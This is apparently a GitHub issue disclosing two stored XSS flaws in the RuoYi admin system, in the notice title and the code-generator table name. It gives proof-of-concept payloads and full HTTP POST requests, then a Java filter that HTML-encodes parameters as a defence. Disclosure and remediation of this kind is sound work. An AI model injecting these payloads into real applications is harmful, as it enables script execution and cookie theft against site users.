lerry903 / RuoYi

A permission management system based on SpringBoot 2.1: easy to read and understand, with a clean and attractive interface. The core stack uses Spring, MyBatis and Shiro with no other heavy dependencies. Run it directly and it is ready to use.

Home Page:http://www.ruoyi.vip


There are two XSS vulnerabilities

ki9mu opened this issue · comments

After the administrator has logged in, open the following page:
System management -> Notice
Then add the following XSS statement to the announcement title.
poc: ”><sCript>alertxss</SCript>
Here is the POST request:

POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close

noticeId=10&noticeTitle=%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E&noticeType=1&noticeContent=%3Cp%3E%E2%80%9D%26gt%3B%26lt%3BsCript%26gt%3Balert%60xss%60%26lt%3B%2FSCript%26gt%3B%3Cbr%3E%3C%2Fp%3E&status=0&=

After the administrator has logged in, open the following page:
System tools -> Code generation
Then click Import, select any table and click OK. Then click Edit, click Basic information, and enter the following XSS statement in the table name column.
poc2: ')" onmousemove=alert(document.cookie) a=(1
Here is the POST request:

POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close

tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&tableComment=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A%E8%A1%A8&className=SysNotice&functionAuthor=ruoyi&remark=&columns%5B0%5D.columnId=1&columns%5B0%5D.sort=1&columns%5B0%5D.columnComment=%E5%85%AC%E5%91%8AID&columns%5B0%5D.javaType=Integer&columns%5B0%5D.javaField=noticeId&columns%5B0%5D.isInsert=1&columns%5B0%5D.queryType=EQ&columns%5B0%5D.htmlType=input&columns%5B0%5D.dictType=&columns%5B1%5D.columnId=2&columns%5B1%5D.sort=2&columns%5B1%5D.columnComment=%E5%85%AC%E5%91%8A%E6%A0%87%E9%A2%98&columns%5B1%5D.javaType=String&columns%5B1%5D.javaField=noticeTitle&columns%5B1%5D.isInsert=1&columns%5B1%5D.isEdit=1&columns%5B1%5D.isList=1&columns%5B1%5D.isQuery=1&columns%5B1%5D.queryType=EQ&columns%5B1%5D.isRequired=1&columns%5B1%5D.htmlType=input&columns%5B1%5D.dictType=&columns%5B2%5D.columnId=3&columns%5B2%5D.sort=3&columns%5B2%5D.columnComment=%E5%85%AC%E5%91%8A%E7%B1%BB%E5%9E%8B%EF%BC%881%E9%80%9A%E7%9F%A5+2%E5%85%AC%E5%91%8A%EF%BC%89&columns%5B2%5D.javaType=String&columns%5B2%5D.javaField=noticeType&columns%5B2%5D.isInsert=1&columns%5B2%5D.isEdit=1&columns%5B2%5D.isList=1&columns%5B2%5D.isQuery=1&columns%5B2%5D.queryType=EQ&columns%5B2%5D.isRequired=1&columns%5B2%5D.htmlType=select&columns%5B2%5D.dictType=&columns%5B3%5D.columnId=4&columns%5B3%5D.sort=4&columns%5B3%5D.columnComment=%E5%85%AC%E5%91%8A%E5%86%85%E5%AE%B9&columns%5B3%5D.javaType=String&columns%5B3%5D.javaField=noticeContent&columns%5B3%5D.isInsert=1&columns%5B3%5D.isEdit=1&columns%5B3%5D.isList=1&columns%5B3%5D.isQuery=1&columns%5B3%5D.queryType=EQ&columns%5B3%5D.htmlType=summernote&columns%5B3%5D.dictType=&columns%5B4%5D.columnId=5&columns%5B4%5D.sort=5&columns%5B4%5D.columnComment=%E5%85%AC%E5%91%8A%E7%8A%B6%E6%80%81%EF%BC%880%E6%AD%A3%E5%B8%B8+1%E5%85%B3%E9%97%AD%EF%BC%89&columns%5B4%5D.javaType=String&columns%5B4%5D.javaField=status&columns%5B4%5D.isInsert=1&columns%5B4%5D.isEdit=1&columns%5B4%5D.isList=1&columns%5B4%5D.isQuery=1&columns%5B4%5D.queryType=EQ&columns%5B4%5D.htmlType=radio&columns%5B4%5D.dictType=&columns%5B5%5D.columnId=6&columns%5B5%5D.sort=6&columns%5B5%5D.columnComment=%E5%88%9B%E5%BB%BA%E8%80%85&columns%5B5%5D.javaType=String&columns%5B5%5D.javaField=createBy&columns%5B5%5D.isInsert=1&columns%5B5%5D.queryType=EQ&columns%5B5%5D.htmlType=input&columns%5B5%5D.dictType=&columns%5B6%5D.columnId=7&columns%5B6%5D.sort=7&columns%5B6%5D.columnComment=%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4&columns%5B6%5D.javaType=Date&columns%5B6%5D.javaField=createTime&columns%5B6%5D.isInsert=1&columns%5B6%5D.queryType=EQ&columns%5B6%5D.htmlType=datetime&columns%5B6%5D.dictType=&columns%5B7%5D.columnId=8&columns%5B7%5D.sort=8&columns%5B7%5D.columnComment=%E6%9B%B4%E6%96%B0%E8%80%85&columns%5B7%5D.javaType=String&columns%5B7%5D.javaField=updateBy&columns%5B7%5D.isInsert=1&columns%5B7%5D.isEdit=1&columns%5B7%5D.queryType=EQ&columns%5B7%5D.htmlType=input&columns%5B7%5D.dictType=&columns%5B8%5D.columnId=9&columns%5B8%5D.sort=9&columns%5B8%5D.columnComment=%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4&columns%5B8%5D.javaType=Date&columns%5B8%5D.javaField=updateTime&columns%5B8%5D.isInsert=1&columns%5B8%5D.isEdit=1&columns%5B8%5D.queryType=EQ&columns%5B8%5D.htmlType=datetime&columns%5B8%5D.dictType=&columns%5B9%5D.columnId=10&columns%5B9%5D.sort=10&columns%5B9%5D.columnComment=%E5%A4%87%E6%B3%A8&columns%5B9%5D.javaType=String&columns%5B9%5D.javaField=remark&columns%5B9%5D.isInsert=1&columns%5B9%5D.isEdit=1&columns%5B9%5D.isList=1&columns%5B9%5D.queryType=EQ&columns%5B9%5D.htmlType=input&columns%5B9%5D.dictType=&tplCategory=crud&packageName=com.ruoyi.system&moduleName=system&businessName=notice&functionName=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A&params%5BparentMenuId%5D=&params%5BparentMenuName%5D=&genType=0&genPath=%2F&subTableName=&params%5BtreeCode%5D=&params%5BtreeParentCode%5D=&params%5BtreeName%5D=
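Both reports share one root cause: the stored values (noticeTitle, tableName) are later rendered into HTML and into a quoted attribute without encoding. The servlet filter below is an added illustration of one defence-in-depth layer, not RuoYi's own code: it wraps form parameters under assumed URL patterns so that the two posted payloads reach the controller as inert entity-encoded text. Context-aware encoding in the templates that render these fields remains the primary fix, since a value placed inside an event-handler attribute needs JavaScript-string encoding as well.

```java
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;
import java.io.IOException;

// Hypothetical filter (not part of RuoYi): registered for /system/notice/* and /tool/gen/*,
// it hands controllers an HTML-encoded view of every request parameter.
public class HtmlEncodingFilter implements Filter {

    // Encodes the five characters that let a value break out of text content or a
    // quoted attribute, which is exactly what the two reported payloads rely on:
    //   ”><sCript>alert`xss`</SCript>           -> ”&gt;&lt;sCript&gt;alert`xss`&lt;/SCript&gt;
    //   ')" onmousemove=alert(document.cookie)  -> &#39;)&quot; onmousemove=alert(document.cookie)
    static String encode(String v) {
        if (v == null) return null;
        StringBuilder sb = new StringBuilder(v.length() + 16);
        for (char c : v.toCharArray()) {
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Spring's form data binder reads parameters through getParameterValues, so
    // overriding it (and getParameter for direct callers) covers @ModelAttribute binding.
    static class EncodedRequest extends HttpServletRequestWrapper {
        EncodedRequest(HttpServletRequest req) { super(req); }

        @Override public String getParameter(String name) { return encode(super.getParameter(name)); }

        @Override public String[] getParameterValues(String name) {
            String[] raw = super.getParameterValues(name);
            if (raw == null) return null;
            String[] out = new String[raw.length];
            for (int i = 0; i < raw.length; i++) out[i] = encode(raw[i]);
            return out;
        }
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        chain.doFilter(new EncodedRequest((HttpServletRequest) req), res);
    }
}
```

Fields that legitimately hold HTML (the noticeContent editor body) should be excluded from the filter and sanitised with an allow-list instead, otherwise their markup is double-encoded on display.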